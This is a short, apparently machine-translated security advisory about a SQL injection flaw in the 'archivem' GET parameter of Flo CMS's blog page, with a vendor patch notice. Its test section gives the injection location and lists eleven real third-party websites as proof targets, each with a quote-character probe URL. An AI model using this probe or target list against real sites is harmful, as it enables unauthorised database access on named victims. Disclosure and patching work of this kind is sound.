Release date: 2013-09-05
Updated on: 2013-09-08
Affected Systems:
Flo CMS
Description:
--------------------------------------------------------------------------------
Flo CMS is a content management system.
Flo CMS does not properly filter/blog/index. asp's "archivem" GET parameter. Remote attackers can exploit this vulnerability to perform SQL queries by injecting arbitrary SQL code.
<* Source: Ashiyane Digital Security Team
Link: http://secunia.com/advisories/54678/
Http://packetstormsecurity.com/files/123058/Flo-CMS-SQL-Injection.html
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
# [+] Exploit:
#
# [+] Location: [Target]/blog/index. asp? Archivem = [SQL Injection]
#
#-------
# Proof:
#-------
#
# Http://www.kellschamber.ie/blog/index.asp? Archivem ='
#
# Http://www.locumotion.com/blog/index.asp? Archivem ='
#
# Http://www.tamhnach.org/blog/index.asp? Archivem ='
#
# Http://www.royaltaragolfclub.com/blog/index.asp? Archivem ='
#
# Http://www.thebective.ie/blog/index.asp? Archivem ='
#
# Http://www.slanefarmhostel.ie/blog/index.asp? Archivem ='
#
# Http://www.sandbar.ie/blog/index.asp? Archivem ='
#
# Http://www.recruitmentbureau.com/blog/index.asp? Archivem ='
#
# Http://www.joecurrancommercials.com/blog/index.asp? Archivem ='
#
# Http://www.littonlanetraining.com/blog/index.asp? Archivem ='
#
# Http://www.kentstownmontessori.com//blog/index.asp? Archivem ='
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Flo CMS
-------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
Http://www.flocms.ie